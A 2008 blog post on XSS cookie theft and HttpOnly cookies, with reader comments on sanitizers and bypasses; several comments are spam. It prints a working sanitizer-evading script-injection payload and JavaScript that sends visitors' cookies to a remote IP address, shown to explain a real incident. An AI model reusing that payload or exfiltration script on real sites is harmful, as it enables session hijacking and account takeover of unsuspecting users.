Protecting Your Cookies: HttpOnly

August 28, 2008

So I have this friend. I've told him time and time again how dangerous XSS vulnerabilities are, and how XSS is now the most common of all publicly reported security vulnerabilities -- dwarfing old standards like buffer overruns and SQL injection. But will he listen? No. He's hard headed. He had to go and write his own HTML sanitizer. Because, well, how difficult can it be? How dangerous could this silly little toy scripting language running inside a browser be?

As it turns out, far more dangerous than expected.

To appreciate just how significant XSS hacks have become, think about how much of your life is lived online, and how exactly the websites you log into on a daily basis know who you are. It's all done with HTTP cookies, right? Those tiny little identifiying headers sent up by the browser to the server on your behalf. They're the keys to your identity as far as the website is concerned.

Most of the time when you accept input from the user the very first thing you do is pass it through a HTML encoder. So tricksy things like:

<script>alert('hello XSS!');</script>

are automagically converted into their harmless encoded equivalents:

&lt;script&gt;alert('hello XSS!');&lt;/script&gt;

In my friend's defense (not that he deserves any kind of defense) the website he's working on allows some HTML to be posted by users. It's part of the design. It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user. You're put in the uncomfortable position of having to discern good from bad, and decide what to do with the questionable stuff.

Imagine, then, the surprise of my friend when he noticed some enterprising users on his website were logged in as him and happily banging away on the system with full unfettered administrative privileges.

How did this happen? XSS, of course. It all started with this bit of script added to a user's profile page.

<img src=""http://www.a.com/a.jpg<script type=text/javascript 
src="http://1.2.3.4:81/xss.js">" /><<img 
src=""http://www.a.com/a.jpg</script>"

Through clever construction, the malformed URL just manages to squeak past the sanitizer. The final rendered code, when viewed in the browser, loads and executes a script from that remote server. Here's what that JavaScript looks like:

window.location="http://1.2.3.4:81/r.php?u="
+document.links[1].text
+"&l="+document.links[1]
+"&c="+document.cookie;

That's right -- whoever loads this script-injected user profile page has just unwittingly transmitted their browser cookies to an evil remote server!

As we've already established, once someone has your browser cookies for a given website, they essentially have the keys to the kingdom for your identity there. If you don't believe me, get the Add N Edit cookies extension for Firefox and try it yourself. Log into a website, copy the essential cookie values, then paste them into another browser running on another computer. That's all it takes. It's quite an eye opener.

If cookies are so precious, you might find yourself asking why browsers don't do a better job of protecting their cookies. I know my friend was. Well, there is a way to protect cookies from most malicious JavaScript: HttpOnly cookies.

When you tag a cookie with the HttpOnly flag, it tells the browser that this particular cookie should only be accessed by the server. Any attempt to access the cookie from client script is strictly forbidden. Of course, this presumes you have:

  1. A modern web browser
  2. A browser that actually implements HttpOnly correctly

The good news is that most modern browsers do support the HttpOnly flag: Opera 9.5, Internet Explorer 7, and Firefox 3. I'm not sure if the latest versions of Safari do or not. It's sort of ironic that the HttpOnly flag was pioneered by Microsoft in hoary old Internet Explorer 6 SP1, a bowser which isn't exactly known for its iron-clad security record.

Regardless, HttpOnly cookies are a great idea, and properly implemented, make huge classes of common XSS attacks much harder to pull off. Here's what a cookie looks like with the HttpOnly flag set:

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=ig2fac55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: user=t=bfabf0b1c1133a822; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Tue, 26 Aug 2008 10:51:08 GMT
Content-Length: 2838

This isn't exactly news; Scott Hanselman wrote about HttpOnly a while ago. I'm not sure he understood the implications, as he was quick to dismiss it as "slowing down the average script kiddie for 15 seconds". In his defense, this was way back in 2005. A dark, primitive time. Almost pre YouTube.

HttpOnly cookies can in fact be remarkably effective. Here's what we know:

  • HttpOnly restricts all access to document.cookie in IE7, Firefox 3, and Opera 9.5 (unsure about Safari)
  • HttpOnly removes cookie information from the response headers in XMLHttpObject.getAllResponseHeaders() in IE7. It should do the same thing in Firefox, but it doesn't, because there's a bug.
  • XMLHttpObjects may only be submitted to the domain they originated from, so there is no cross-domain posting of the cookies.

The big security hole, as alluded to above, is that Firefox (and presumably Opera) allow access to the headers through XMLHttpObject. So you could make a trivial JavaScript call back to the local server, get the headers out of the string, and then post that back to an external domain. Not as easy as document.cookie, but hardly a feat of software engineering.

Even with those caveats, I believe HttpOnly cookies are a huge security win. If I -- er, I mean, if my friend -- had implemented HttpOnly cookies, it would have totally protected his users from the above exploit!

HttpOnly cookies don't make you immune from XSS cookie theft, but they raise the bar considerably. It's practically free, a "set it and forget it" setting that's bound to become increasingly secure over time as more browsers follow the example of IE7 and implement client-side HttpOnly cookie security correctly. If you develop web applications, or you know anyone who develops web applications, make sure they know about HttpOnly cookies.

Now I just need to go tell my friend about them. I'm not sure why I bother. He never listens to me anyway.

(Special thanks to Shawn expert developer Simon for his assistance in constructing this post.)

Posted by Jeff Atwood
165 Comments

Several questions have come up

Why was HttpOnly implemented by Microsoft on IE6 first
Why is HttpOnly broken on Firefox
Why is it not on all browsers
Why is it not on as standard

All of these have one answer - it is a patch to fix a symptom of bad coding and not a solution

It fixes (or partly fixes) one security hole out of a huge number, it is not a universal fix ...

You should sanitize properly everything from the user or you will have a security problem ...

Jaster on September 1, 2008 5:37 AM

I'd like to seek someone crack my PHP HTML sanitizer ...

Google for htmlspecialchars vulnerability...

giggles on September 1, 2008 8:11 AM

@correct you missed the point entirely and I have a hard time believing that you read what I had to say. Then again I think your comments been sanitized because I find your latest response barely intelligible. Command-line escaping? wtf?

@bex and others, you can't, from today's web servers, have enough information to detect all spoofed attacks, even with encrypted cookies. Buy a good stateful router/firewall, that's my only point.

Also, you don't just need to worry about XSS. You also need to worry about anything else in between you and a web site that steals cookies. If your friend next to you can steal your cookie, he can 'replay' an action and pretend to be you.

Also, can anyone explain why the ajax double-cookie is any sort of remedy? Maybe I'm just thick, but I don't why it's a silver bullet.

Also, if you only send authentication cookies over https, and never in plaintext, would xss exploits be able to steal them?

O''Malley on September 1, 2008 8:34 AM

Why the insistence that IE7 is less broken than Firefox in regards to HttpOnly? I see the same bug in both at http://ha.ckers.org/httponly.cgi

Dan Veditz on September 1, 2008 9:55 AM

Already pointed out but just to show more practical way to bypass HTTPOnly cookies take a look at XSS Tunelling - http://labs.portcullis.co.uk/application/xss-tunnelling/xss-tunnel/

Basically it's a defense in depth approach and quite cheap to implement but obviously not the silver bullet.

FM on September 1, 2008 10:27 AM

Re: validating IP - as others have mentioned, the assumption that changed IP == attempted hack will run into false-positive problems on users from some banks (and perhaps other large companies / AOL users / whatever, but I'm sure about the banks). It's unfortunate.

ways on September 2, 2008 7:31 AM

Wouldn't...

XMLHttpRequest.prototype.__defineGetter__('getAllResponseHeaders', function(){ });

be a good workaround for Firefox's issue?

Sean on September 2, 2008 12:47 PM

Now they'll have to copy the html of the login screen with the expired session message and have their javascript output that instead of stealing the cookies.

David on September 2, 2008 12:57 PM

So, where's the post on what exactly was wrong with the html sanitizer and how exactly you fixed it? Or is that too narrow focus for the blog. :)

Debt Consolidation on September 2, 2008 1:31 PM

The only secure computer is on that is unplugged and (in the case of a laptop) then battery has been removed.

Hell, there even claiming now that microwaves at a specific frequency and intensity can affect the ole analog 'wet' computer...

mac on September 2, 2008 1:35 PM

@omalley:

@correct you missed the point entirely and I have a hard time believing that you read what I had to say.

I read what you said.

Then again I think your comments been sanitized because I find your latest response barely intelligible.

I'm not surprised.

Maybe I'm just thick

...

correct on September 2, 2008 1:59 PM

It's a difficult scenario, because you can't just clobber every questionable thing that comes over the wire from the user.

You do.

mbhunter on September 3, 2008 2:25 AM

@Jonah hits it on the head. There's always a way to hijack a session, even if it's walking up to an unattended computer. Any critical / costly action should require the user to retype their password (or some secondary authentication method).

At least HttpOnly can try to limit what browser scripts can do, and it's a step in the right direction, but as others point out, it's not yet a total fix.

Another fix I can think of would be if running script couldn't load other scripts on the fly (ie via eval), and your web framework would inspect every pages output and remove any scripts references / and perhaps even not allow inline scripts, you could be a lot safer.

Unfortunately there are a lot of vectors of attack, and it's currently very easy for a developer to screw up.

not correct on September 3, 2008 2:55 AM

@ Jonah, I think you're right - when making profile changes etc a password should always be required. Good point indeed.

I'm looking at implementing commenting etc on my site (its a blog, but I don't care too much about the parsing of the blog entries since I'm the only one making them). I was wondering where the author stated that you can't clobber every questionable thing that comes through - Why not? I was thinking of just parsing all angle brackets to their entity codes and then running through the script to look for acceptable tags, but instead of looking at tag letters between and brackets, I'd look at letters between entity codes.

Is there anything glaringly wrong with this approach? Script stuff wouldn't get through because I would only allow specific tags such as strong, em, u, strike etc.

Nick Coad on September 3, 2008 7:15 AM

@bex: B, I, UL, OL, LI, PRE, CODE, STRIKE, and BLOCKQUOTE
If you expect your users to want BLOCKQUOTE, UL, and OL, you should probably be using a smarter text markup language (MediaWiki-esque) in the first place. ISTR Jeff was considering this route for stackoverflow a while back, but rejected it.

My list of HTML tags needed in this blog comment section: P, B, I, S (and possibly STRIKE), (might as well throw in U for completeness), TT (or CODE), PRE, A HREF (with obviously well-formed URLs only). A NAME is too abusable. SMALL might be nice, but it's abusable. BIG is too abusable.

Anonymous Cowherd on September 3, 2008 7:28 AM

RE Another fix and remove any scripts references I neglected to say the web framework would remove any script references that you didn't explicitly allow, which outside of DNS poisoning would pretty much nail the coffin around many XSS.

Then again, it's all a giant band-aid as everything is sent plain-text. It takes only 1 compromised router.........

not correct on September 3, 2008 7:40 AM

It's actually not that complicated. URL encode everything. so for example b becomes lt;b/gt;, etc... then selectively use text substitution to reenable what you want, i.e. 'lt;bgt;' = 'b'
Everything else remains escaped

Tony

Tony BenBrahim on September 3, 2008 12:08 PM

There seems to be a huge emphasis on cookie stealing, but don't forget that XMLHttpObject is extremely dangerous since it can mimic any user action! What if an XSS script loads the user profile form, changes the email address, and then requests a new password be sent to it (via the common Forgot password form)? The account is hijacked without even touching a cookie. Place additional security around these sensitive areas and do not rely solely on the HttpOnly directive.

Jonah on September 3, 2008 1:34 PM

I think what you should implement is explained clearly in the following paper:
http://www.cse.msu.edu/~alexliu/publications/Cookie/cookie.pdf

Serkan on September 3, 2008 1:54 PM

I had not that much clue about cookies. This article has opened alot of things for me. Thanks buddy.

Web Programming on September 4, 2008 3:02 AM

pick a schedule and stick to it

Is this blog dying?

me on September 4, 2008 3:46 AM

Robert C. Barth said: Why not keep a dictionary that maps the cookie credential to the IP used when the credential was granted, and make sure that the IP matches the dictionary entry on every page access?

I'm surprised this isn't a standard practice... is there some gotcha to this I haven't thought of? I'm not a web developer myself, so there could be a simple yeah but to this solution.

The problem with this is users with a fast switching dynamic IP would be continuosly prompted to login again.

Tony on September 4, 2008 6:28 AM

I second Kyle, I have been waiting for the latest in hackery... And I am getting rather im-patient. Sorry, but I love this blog.... A lot...

Braden on September 4, 2008 9:08 AM

Where are the new blogs!!! I am getting antsy =) just wondering

Kyle Woodbury on September 4, 2008 10:05 AM

I wouldn't worry about users with fast switching dynamic IPs. They have a bigger issue that'll plague them until they find a real ISP.

David on September 4, 2008 12:59 PM

oh cool, this information is really useful and definitely is comment worthy! hehe.

The Planes on September 5, 2008 2:19 AM

Where are you Jeff??????!!!!

How come you average a good 16-20 posts a month for 4 years and as soon as I start reading, it drops to once a week? So far I'm contenting myself with trawling through back issues, but, you know. When will normal service be resumed? What about Mr Post Often Post Regular?

Tobermory on September 5, 2008 2:45 AM

How come you average a good 16-20 posts a month for 4 years and as
soon as I start reading, it drops to once a week? So far I'm
contenting myself with trawling through back issues, but, you know.
When will normal service be resumed?

I guess you haven't worked your way up to the August 24 post:
You may have noticed that my posting frequency has declined over
the last three weeks. That's because I've been busy building that
Stack Overflow thing we talked about.

T.E.D. on September 5, 2008 3:08 AM

*More Crickets Chirp*

Simucal on September 5, 2008 3:47 AM

Nice blog, I'm glad to find it. I would not mind if it would be updated every day - thank you for good advices.

Mina Jade on September 5, 2008 4:54 AM

(crickets chirping)

Shmork on September 5, 2008 12:42 PM

Agreed, I checked the page directly encase my Google tool had broken (again). Must be really enjoying the Labor Day weekend.

Matt Ridley on September 5, 2008 1:33 PM

(as in, by Monday)

rofl

don't go getting too big for your boots!

Shdick on September 6, 2008 3:03 AM

p.s. jeff did you ever make a webapp before? your last few posts have been a bit.. entry-level.

Shdick on September 6, 2008 3:05 AM

I see a lot of comments wondering where Jeff has gotten to. Well, I think it's a tad unfair and unrealistic to expect him to be able to post numerous times per week for the rest of eternity. I'll happily keep checking back each day until a new post appears :)

I'm sure normal service will resume, he's probably busy at work, or if not, having some much deserved time to himself.

Alasdair on September 6, 2008 7:05 AM

Well it seems pretty likely that he's trying to put off his next post until it can be the debut of Stack Overflow.

Which, you know, I'm actually in favor of. Looks like a useful site, from the screenshots I've seen.

But it's been now well over a week since the last post. Obviously things are taking a little more time than he thought. Which again, I understand -- how many times have we all been in that position where we're JUST about ready to send something off and, oh, there's a little bug here, and oh, just gotta remember to fix that up here, and oh, CRAP the whole thing is falling apart now, and oh, damn damn damn, and oh....

But come on Jeff! We're your lifeblood here. We are your base! Throw us a bone. Most of us aren't in on the Beta so we're just sitting here with a dead blog, and the coming soon page on stackoverflow.com is pretty uninspiring. We got nothing! If it isn't a sure thing that you'll have something spectacular soon (as in, by Monday), at least just give us a little head's up, something to gnaw on...

(Unless, of course, Jeff has been hit by a car or some other unforeseeable tragedy. In which case I eat my hat.)

Shmork on September 6, 2008 9:24 AM

Are you dead?

Dave on September 7, 2008 3:15 AM

I'm just makin' suggestions, not demands. It'll be almost two weeks without a peep if it goes much longer...

Shmork on September 7, 2008 6:24 AM

Seems to me like the perfect time for a post about maintaining relationships with your clients. Stack Overflow may become a success or might fail, but you've become a name by providing regular posts on codinghorror.com. Now you are moving on to bigger and better things you should not neglect the people who have afforded you the opportunity to make this your career choice.
Your posts of late have been infrequent and in all honesty not up to your usual standard. We, your readers, are still here. But we won'#t be forever.

Bryn on September 7, 2008 11:12 AM

Jeff, say something....

Niyaz PK on September 7, 2008 11:56 AM

If you're able to forget to HTML-encode some user input, you're probably also just concatenating strings of text. If you build your pages using proper XML tools, there is no conceivable way that you can accidentally include unsanitized user input in the page.

clockwork on September 9, 2008 5:07 AM

Well, judging from the new post the mystery of Jeff's absence is seriously solved.

DennisSC on September 13, 2008 4:49 AM

Besides the fact (which you mention) that you can still perform other, non-cookie-related XSS attacks, there is another way to bypass httpOnly protections, regardless of the browser - using XSS to do Cross-Site Tracing (XST) attack.
If the server supports the TRACE method, the malicious script can send a TRACE request and parse the response (which will contain the cookie).
Worse yet, even if the server does not support TRACE, but one of the proxies on the way does (can be reverse proxy, or even the user's organizational proxy), XST can still be accomplished by sending the TRACE request to the proxy...

BUT regardless of XST, I still highly recommend using httpOnly. At least it will block non-XST attacks...

AviD on September 23, 2008 10:41 AM

This blog post is wrong on one key issue - ie7 is still very vulnerable to the XMLHttpRequest exposure of HTTPOnly cookies via response headers.

The fact is, the only browser that locks down this vector is ie8 beta - but FireFox 3.1 will surely lock down this vector. https://bugzilla.mozilla.org/show_bug.cgi?id=380418

The latest version of ie7 (as of this writing)7.0.6001.18000 still exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders()

Jim Manico on September 24, 2008 5:37 AM

The latest version of ie8 beta 2 (as of this writing)8.0.6001.18241 also exposes HTTPOnly cookies via set-cookie headers in XMLHttpRequest.getAllResponseHeaders() - FireFox 3.1 is on track to support this hole, see: https://bugzilla.mozilla.org/show_bug.cgi?id=380418

Jim Manico on September 26, 2008 8:27 AM

Great post, thanks !
This helps a lot.

Naor Rosenberg on November 25, 2008 8:02 AM

If your forum allows HTML, There's no substitute for a _real_ HTML parser.

Daelin the Cruel on January 14, 2009 1:27 AM

Ok - if you update the MSXML Core Services at http://www.microsoft.com/technet/security/bulletin/ms08-069.mspx then IE 8 Beta 2 will prevent HTTPOnly cookies from being read by XMLHTTPRequest (headers) within IE. This is an obscure vector, but IE 8 Beta 2 is the only browser that truly stops set-cookie leakage in headers via javascript. However, to get really crazy, ie 8 beta 2 with MS08-069 still leaks set-cookie2 HTTPOnly cookies in XMLHTTPRequest headers.

FireFox is on track to fix this obscure vector, completely. The FireFox patch at XMLHTTPRequest is marked RESOLVED FIXED and will go live shortly. (https://bugzilla.mozilla.org/show_bug.cgi?id=380418)

Even Safari/Chrome will see complete set-cookie/set-cookie2 XMLHTTPRequest exposure (https://bugs.webkit.org/show_bug.cgi?id=10957) protection shortly - the patch is complete as of 12/21/08

Final really obscure note, the OWASP WEBGOAT HTTPOnly lab is broken and does not show IE 8 Beta 2 with ms08-069 as complete in terms of HTTPOnly protection. However, Robert Hansens' test page now includes set-cookie and set-cookie2 checks for XMLHTTPRequest exposure and should be used until OWASP fixes http://code.google.com/p/webgoat/issues/detail?id=18

Jim Manico on January 23, 2009 12:13 PM

Well, judging from the new post the mystery of Jeff's absence is seriously solved.
http://concernauto.ru/

Olof on January 29, 2009 1:39 AM

Or you can do something crazy like... Oh, I dunno, not trust the client for everything.

When I create a session on my (PHP) site the client receives two cookies: ID and HASH. The ID in the database of the session and a random hash (md5(constant.time().mt_rand(1,9999999))) which is associated with the session and used in looking it up.

From there, I also generate a 'security hash' server side with each request that is basically: md5($_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT'].$_SERVER['HTTP_X_FORWARDED_FOR']); This hash is compared against the security hash stored upon login. If it doesn't match, you don't associate with the session. On top of this, there is an inactivity timeout and and absolute timeout on each session (1 hr and 3 hrs respectively).

So, in order to hijack a session, you'd have to obtain the ID and HASH cookies as you described (or through some other method), manage to fool my web server into thinking you're using the actual client's IP, and realize what the final piece is and forge your user-agent to match the actual client's. All within at MOST 3 hours.

CSRF, on the other hand, this provides no protection against :)

NuclearDog on March 16, 2009 1:15 PM

Besides the fact (which you mention) that you can still perform other, non-cookie-related XSS attacks, there is another way to bypass httpOnly protections, regardless of the browser - using XSS to do Cross-Site Tracing (XST) attack.
http://guruguard.ru

Megel on May 13, 2009 1:46 PM

Who knows where to download XRumer 5.0 Palladium?
Help, please. All recommend this program to effectively advertise on the Internet, this is the best program!

CocoChanels on June 26, 2009 2:58 AM

Any chance you'll update the refactormycode snippet to include the security fixes you put in as a result of this rude awakening?

Tristan on July 24, 2009 3:45 AM

Don't forget those of us with dual load balanced internet connections, in your proposed solutions. Every other request comes from a different IP address (a set of two, in this case).

Bryce on August 11, 2009 11:01 AM

Well, yeah. That's what happens when you think a sanitiser should try and clean the input. Another approach is to run a full HTML parser and construct a DOM tree from the document. Filter said DOM tree. Regenerate HTML from this tree.

Valid HTML will get through unscathed. Slightly incorrect but harmless HTML may even end up fixed. Bad will either end up filtered out of the DOM tree or so mangled that the XSS attack won't work (trickery like what's just given will fall flat and probably turn into img src= )

Anon on February 6, 2010 10:38 PM

I see a bunch of misinformation and misunderstandings flying around here.

First, HTTP connections are over TCP, not UDP. That means the IP address of an HTTP connection can not readily be spoofed against any system with good TCP sequence number randomization, which in turn means unless your server is running on some absolutely ancient OS they should not be spoofable. IP spoofing over UDP = easy, IP spoofing over TCP = hard. That means that it would indeed be useful to encode the IP address as part of the session cookie.

Second, to Jeff: Is your core intent here to build a working website, or to show the world what a macho programmer you are? If it's the former, you damn well should be building on solid components, and you certainly should consider a well-tested input validator and sanitizer as one of them, if you could find a suitable one.

Third, the concept of input sanitizer is highly questionable, as a couple people said; this is a good example of why. Trying to helpfully clean up toxic input goes right along with trying to remove that virus from the application document before you pass it along to the user. Don't sanitize bad input; reject it (preferably handling it with gloves and tongs in the process.)

Fourth, even input validation should be based on matching and accepting a limited (as in brain-dead-simple) subset of valid constructs, not on attempting to match and reject invalid constructs. Anything which doesn't clearly match a limited set of valid values should be tossed (or in a posting context, fed back to the sender with an invitation to correct it.)

There is a lot of well-developed and hard-earned wisdom about how to write security-conscious software. It starts with learning about the topic, and then not rejecting basic principles because I want to do it my way!

You're expecting a lot of people to trust you here; time to step up and live up to that trust.

Clifton on February 6, 2010 10:38 PM

So instead of actually fixing the problem (by, say, using a real HTML parser/sanitizer and getting rid of scripts), you've chosen to put on a second band-aid which doesn't even work the way it's supposed to half the time.

Well played. Don't bother trying to cure the disease, just treat the symptoms.

This is proof positive of the importance of creating a good design at the very beginning. Not only is it hard to fix mistakes in the design later on, but developers and geeks in general are ridiculously stubborn and can't bear the idea of having made a serious mistake; they'd rather just patch it up one way or another, until the patch fails and they have to make another patch, and so on and so forth. Not a good situation.

Aaron G on February 6, 2010 10:38 PM

Kris, authentication cookies ARE encrypted. This isn't an issue of privilege escalation by modifying a cookie, it's a simple replay attack.

And with respect to another comment - I wouldn't say that it's technically a blacklist, it really is a whitelist, but the problem is that *it doesn't fail safe*.

A strict parser fails safe. If it can't parse a tag, it just fails on it and the cruft disappears from subsequent output. This uber-dumb sanitizer can choke on all kinds of invalid input and proceed to ignore it (i.e. leave it the way it is), but the browser, being liberal in what it accepts as Jeff also loves to advocate, will happily try to fix it up and execute whatever badness is inside.

To believe that a few clunky regular expressions would be equally effective is pure geek conceit.

Aaron G on February 6, 2010 10:38 PM

You really want something the equivalent of Perl's taint-checking on input, but adapted to different classes of data.

This might be a good project to try out the idea Ragenwald (Reg Braithwaite) was kicking around a while back in the context of Haskell/ML strongly-typed languages:

Create distinct derived types of strings for data which comes from various contexts and data which may be put into certain contexts. For example, you have UntrustedString and its derived classes UntrustedHeaderValue and UntrustedFormInput. You have a distinct type family of strings for stuff to store in the DB, DBSafeURIString, DBSafeNoHTMLString and DBSafeValidatedHTMLString, and another family for things which may be output back to the browser, for instance StringWithNoHTML, and URIEncodedURIString, and FormattedHTMLString.

You then make your validation functions return these very specific types, as appropriate for what they do, for instance accepting a UntrustedFormInput and returning a DBSafeNoHTMLString, and you let the compiler help you spot, for instance, that you are taking UntrustedFormInput and trying to directly store it as a DBSafeNoHTMLString, or are using a DBSafeValidatedHTMLSTring in a display function which expects a StringWithNoHTML.

Just saying I'll HTML-encode all inputs before I store them doesn't necessarily make anything safer; it's all context dependent. Maybe you HTML-encoded it but you needed to URI-encode it, or vice-versa. Or maybe you just forgot. This doesn't help with the specific problem here of just failing to screen some of the cases you need to validate, but in theory it should help. (Never tried it.)

Clifton on February 6, 2010 10:38 PM

Can't people edit cookies no matter what? They are all stored in a file somewhere on a computer, so people (especially) in linux, for example, could edit this file through terminal (assuming it's read only for normal users), and easily edit the cookies.

Jon Neal on February 6, 2010 10:38 PM

very interesting post, you can always find the solution in underlying comments. a LASER POINTER from http://www.perfectlasers.net/ is a wonderful gadget for enjoyment.

chloeelvis on May 23, 2010 11:16 PM

Great post - I'm HttpOnly's newest fan and user. Thanks Jeff.

David Underhill on July 24, 2010 1:02 PM

I see programs that won't let you include single quotes or other such characters because they consider them to be dangerous. There is no point in that.
I have met similar phenomena for many times. http://www.astronomylasers.com/

Daisy on August 4, 2010 1:19 AM

I have never realized this earlier and now onward I will definitely take care.
Thanks

Lmpandey on January 17, 2011 7:21 AM

«Back

The comments to this entry are closed.